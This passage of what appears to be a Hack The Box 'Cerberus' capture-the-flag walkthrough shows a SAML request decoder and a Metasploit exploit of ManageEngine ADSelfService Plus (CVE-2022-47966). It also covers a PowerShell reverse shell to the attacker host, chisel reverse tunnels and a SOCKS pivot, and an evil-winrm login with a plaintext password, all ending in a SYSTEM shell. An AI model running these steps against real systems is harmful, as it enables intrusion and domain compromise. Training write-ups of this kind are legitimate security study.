                         Version="2.0"
                         xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
      <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f</saml2:Issuer>
      <saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"/>
      <saml2p:RequestedAuthnContext Comparison="exact">
        <saml2:AuthnContextClassRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
      </saml2p:RequestedAuthnContext>
    </saml2p:AuthnRequest>
  2. Log in as matthew, and it will redirect you to https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
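The decoding chain behind option 1, as an added Python example (my own, not from the writeup, from ManageEngine or from the Metasploit module): the SAML HTTP-Redirect binding wraps the AuthnRequest as raw DEFLATE, then base64, then URL-encoding, while the HTTP-POST binding is base64 only. The AuthnRequest below is a constructed, trimmed copy of the one decoded above, the encoder exists only to build that sample offline, and the function names are assumptions of this example.

```python
import base64
import urllib.parse
import zlib
import xml.etree.ElementTree as ET

NS = {"saml2p": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml2": "urn:oasis:names:tc:SAML:2.0:assertion"}

# Constructed AuthnRequest, trimmed from the one decoded above (same GUID, same endpoints).
SAMPLE_AUTHN_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<saml2p:AuthnRequest xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" '
    'AssertionConsumerServiceURL="https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f" '
    'Destination="https://dc.cerberus.local/adfs/ls/" ID="_68c55db128eef523034f50338a7aa6db" '
    'ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0">'
    '<saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">'
    'https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f</saml2:Issuer>'
    '</saml2p:AuthnRequest>'
)


def encode_redirect_binding(xml_text):
    """HTTP-Redirect binding as the SP emits it: raw DEFLATE -> base64 -> URL-encode."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)          # wbits -15: raw deflate, no zlib header
    deflated = comp.compress(xml_text.encode("utf-8")) + comp.flush()
    return urllib.parse.quote(base64.b64encode(deflated).decode("ascii"), safe="")


def encode_post_binding(xml_text):
    """HTTP-POST binding: base64 only, no DEFLATE."""
    return base64.b64encode(xml_text.encode("utf-8")).decode("ascii")


def decode_saml_param(param):
    """Reverse either binding: URL-decode, base64-decode, then inflate unless the bytes
    are already plain XML (the POST binding), which starts with '<'."""
    raw = base64.b64decode(urllib.parse.unquote(param))
    if raw.lstrip().startswith(b"<"):
        return raw.decode("utf-8")
    return zlib.decompress(raw, -15).decode("utf-8")


def extract_request_details(xml_text):
    """Pull the fields an analyst looks at; the GUID is the last path segment of the ACS URL."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    acs = root.get("AssertionConsumerServiceURL", "")
    issuer = root.find("saml2:Issuer", NS)
    return {
        "acs_url": acs,
        "destination": root.get("Destination"),
        "issuer": issuer.text if issuer is not None else None,
        "guid": acs.rsplit("/", 1)[-1] if "/samlLogin/" in acs else None,
    }


if __name__ == "__main__":
    param = encode_redirect_binding(SAMPLE_AUTHN_REQUEST)
    print(extract_request_details(decode_saml_param(param)))
```

To use it on a captured request, pass the raw `SAMLRequest=` value from the redirect URL to `decode_saml_param`. From a defender's side, note that the GUID is not a secret: option 2 shows any user who reaches the login page is redirected to it, so the fix for this box is the build, not hiding the endpoint.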

Now we need to get the ISSUER_URL from the offline backup:

┌──(anurag㉿anurag)-[~/htb/Cerberus/loot/offlinebackup]
└─$ grep ISSUER *
ADSIAMIDPAuthConfigParams.txt:1 ISSUER_URL      http://dc.cerberus.local/adfs/services/trust

With GUID and ISSUER_URL set, we get a shell from Metasploit:

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > show options 

Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):

   Name         Current Setting                               Required  Description
   ----         ---------------                               --------  -----------
   GUID         67a8d101690402dc6a6744b8fc8a7ca1acf88b2f      yes       The SAML endpoint GUID
   ISSUER_URL   http://dc.cerberus.local/adfs/services/trust  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_STATE                                                no        The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
   RHOSTS       172.16.22.1                                   yes       The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
   RPORT        9251                                          yes       The target port (TCP)
   SSL          true                                          no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                                    no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /samlLogin                                    yes       The SAML endpoint URL
   URIPATH                                                    no        The URI to use for this exploit (default is random)
   VHOST                                                      no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         tun0             yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Command

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Powershell session session 1 opened (10.10.16.7:4444 -> 10.10.11.205:50564) at 2025-08-15 12:43:42 +0530

PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> whoami
nt authority\system
PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> 

Redo pivot with Chisel

I’ll redo the pivot with chisel.

On the icinga Linux host:

www-data@icinga:/tmp$ ./chisel client 10.10.16.7:8000 R:5985:172.16.22.1:5985
2025/08/15 05:44:56 client: Connecting to ws://10.10.16.7:8000
2025/08/15 05:44:59 client: Connected (Latency 252.6704ms)

On Kali:

└─$ ./chisel server -p 8000 --reverse
2025/08/15 11:13:49 server: Reverse tunnelling enabled
2025/08/15 11:13:49 server: Fingerprint IpM4rdlC50EVB042JO5iJdUl2nUrESOojpYZt9fMLL8=
2025/08/15 11:13:49 server: Listening on http://0.0.0.0:8000
2025/08/15 11:14:54 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listening

We get a Windows shell:

└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents>

For the double pivot I will upload chisel to Windows and run:

*Evil-WinRM* PS C:\temp> ./chisel_win.exe client 10.10.16.7:8000 R:socks
chisel_win.exe : 2025/08/14 23:02:05 client: Connecting to ws://10.10.16.7:8000
    + CategoryInfo          : NotSpecified: (2025/08/14 23:0...10.10.16.7:8000:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2025/08/14 23:02:08 client: Connected (Latency 251.2766ms)

On Kali:

2025/08/15 11:32:03 server: session#2: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/15 11:32:03 server: session#2: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Now I can visit https://127.0.0.1:9251 by pointing Firefox at the SOCKS proxy on port 1080 with FoxyProxy.

Now let’s try again with msfconsole

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > show options 

Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):

   Name         Current Setting                               Required  Description
   ----         ---------------                               --------  -----------
   GUID         67a8d101690402dc6a6744b8fc8a7ca1acf88b2f      yes       The SAML endpoint GUID
   ISSUER_URL   http://dc.cerberus.local/adfs/services/trust  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
   Proxies      socks5:127.0.0.1:1080                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_STATE                                                no        The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
   RHOSTS       dc.cerberus.local                             yes       The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
   RPORT        9251                                          yes       The target port (TCP)
   SSL          true                                          no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                                    no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /samlLogin                                    yes       The SAML endpoint URL
   URIPATH                                                    no        The URI to use for this exploit (default is random)
   VHOST                                                      no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.16.7       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         10.10.16.7       yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Command

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Powershell session session 1 opened (10.10.16.7:4444 -> 10.10.11.205:58805) at 2025-08-15 12:18:31 +0530

PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> whoami
nt authority\system
PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> 

I think the issue was with the payload

And we find root.txt:

PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> whoami
nt authority\system
PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> cd C:\Users\
PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/30/2023   2:44 AM                adfs_svc$                                                             
d-----        1/30/2023   4:14 AM                adfs_svc$.CERBERUS                                                    
d-----       11/29/2022   4:24 AM                Administrator                                                         
d-----        1/22/2023  11:22 AM                matthew                                                               
d-r---        4/10/2020  10:49 AM                Public                                                                

PS C:\Users> cd Administrator
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        8/14/2025  10:38 PM             34 root.txt  
